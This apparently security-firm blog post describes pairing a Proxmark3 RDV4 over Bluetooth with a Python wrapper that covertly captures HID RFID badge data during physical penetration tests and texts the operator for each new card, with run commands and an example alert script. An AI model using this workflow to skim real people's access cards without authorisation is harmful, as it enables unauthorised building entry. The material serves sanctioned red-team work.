29 June 2020
In this post, we'll go over creating a more covert application for the Proxmark3 using the BlueTooth module we installed previously along with some ideas for masking your actions. One thing to note is that this post is based on my personal and professional experience using previous versions of the Proxmark3 as well as the RDV4.
If you haven't seen our previous posts about setting up the Proxmark3 with a clean Kali image and installing the battery/BlueTooth module check them out.
Generally, when on a physical penetration test or social engineering engagement where you may want to capture RFID cards, you'll also want to confirm that what you're doing is actually proving fruitful. In this instance, that means capturing legitimate RFID card information. With previous versions of the Proxmark3, this usually involved connecting the Proxmark to a running computer inside a bag, where any captured cards were printed to the terminal window, or using the on-board memory to store any captured cards. Of course there were more creative ways around this, such as SSHing into the computer. But generally, both of these approaches made it difficult to actively monitor captured cards without some sort of SSH connection or a server that the data was posted to. Well, what if we could get a text every time a new card was captured?
With the release of the Proxmark RDV4, the setup process and subsequent execution have become much easier and the barrier for entry has decreased with relation to covert operations. If you're using the Proxmark3 I'd highly recommend upgrading to the RDV4 due to the vast improvements in size and antenna components.
Introducing ProxmarkWrapper (found here: https://github.com/FortyNorthSecurity/ProxmarkWrapper), a simple Python wrapper application that will text the operator when a few different actions occur. The script will text you if:
Here's an example of what you could see when running and capturing new cards (you should only receive a text per unique card number once).
To get things started, we'll be working with the Proxmark3 RDV4 along with the BlueTooth/battery module; so the initial step will be to power it on. Note: We'll be mainly using a Mac for testing but the steps and script can easily be modified for other operating systems.
To use the wrapper program first connect the Proxmark3 to your computer via BlueTooth. If you're having issues connecting on Mac, see this and make sure the BT add-on support is present when the client is run:
Before running proxmarkWrapper.py just be sure to modify the first couple lines of code with your Gmail email address (I suggest a throwaway), Gmail password, and an email or phone number(s) to send the messages to.
If you're using a Kali VM, the only way I was able to fully get it to work was with a BlueTooth adapter and the connection wasn't great at times. Admittedly, I'm not great at debugging the BT communication protocol and tools so input would be great here from the community. If you run into issues, see this, as I had to reference that page a few times. Once you get connected via BT, you should see something similar to this:
If connecting over BT and on Linux, use the following - where the MAC address corresponds with your Proxmark3 RDV4's MAC address. Also be sure to keep "bt:" before your MAC address:
./proxmarkWrapper.py -l bt:aa:bb:cc:dd:ee:ff
If connecting over BT on Mac, just use the following (it should be the same on your system):
./proxmarkWrapper.py -l /dev/tty.PM3_RDV40-DevB
Once it's running and everything looks good, you should have received a text message saying the Proxmark client is running and ready to capture cards. If you push the button once (which normally cancels the capture), it will rerun the capture command "lf hid watch". If the button is pressed a second time, the program will send another text alerting the user and close gracefully.
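The core of what the wrapper does above (watch the client output, text once per unique card, keep the Gmail credentials out of the script) as an added example in Python; this is not ProxmarkWrapper's own code. It assumes each "lf hid watch" read appears as a line containing "TAG ID: <hex>", the sample output lines are constructed, and the PMW_* environment variable names are hypothetical.

```python
import os
import re
import smtplib
from email.message import EmailMessage

# Assumed shape of an "lf hid watch" line: "TAG ID: <hex>" then the decoded fields.
TAG_RE = re.compile(r"TAG ID:\s*([0-9a-fA-F]+)")

def extract_tag_id(line):
    """Return the lower-cased hex tag ID from one client output line, or None."""
    m = TAG_RE.search(line)
    return m.group(1).lower() if m else None

class CardNotifier:
    """Alert once per unique tag ID, as the wrapper is described to do."""
    def __init__(self, send=lambda body: None):  # no-op sender keeps this offline
        self.seen, self.alerts, self.send = set(), [], send
    def feed(self, line):
        """Consume one output line; return True if a new-card alert was sent."""
        tag = extract_tag_id(line)
        if tag is None or tag in self.seen:
            return False
        self.seen.add(tag)
        body = f"New card captured: {tag}"
        self.alerts.append(body)
        self.send(body)
        return True

def send_via_gmail(body):
    """Send body to the alert address over Gmail SMTP. Credentials come from
    the environment (hypothetical variable names) rather than being edited
    into the script's first lines, so they never sit in the source file."""
    user = os.environ["PMW_GMAIL_USER"]
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = user, os.environ["PMW_ALERT_TO"], "Proxmark"
    msg.set_content(body)
    with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtp:
        smtp.login(user, os.environ["PMW_GMAIL_APP_PASSWORD"])
        smtp.send_message(msg)

# Constructed client output: one card read twice, a prompt line, then a new card.
SAMPLE_OUTPUT = [
    "TAG ID: 2006ec0c25 (1554) - Format Len: 26bit - FC: 118 - Card: 1554",
    "TAG ID: 2006ec0c25 (1554) - Format Len: 26bit - FC: 118 - Card: 1554",
    "proxmark3> ",
    "TAG ID: 2006ec0c26 (1555) - Format Len: 26bit - FC: 118 - Card: 1555",
]
def run_sample():
    n = CardNotifier()  # pass send=send_via_gmail to actually deliver the texts
    return [n.feed(line) for line in SAMPLE_OUTPUT], n.alerts
```

Gmail SMTP logins from a script need an app-specific password on the throwaway account, which is why the sender reads one from the environment instead of the account password.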
While ProxmarkWrapper isn't anything new or some new breakthrough, I thought it would be kind of a cool take on capturing RFID cards for physical engagements in a more covert manner while being able to see when a card was captured. All this without the need to SSH into the system running the client.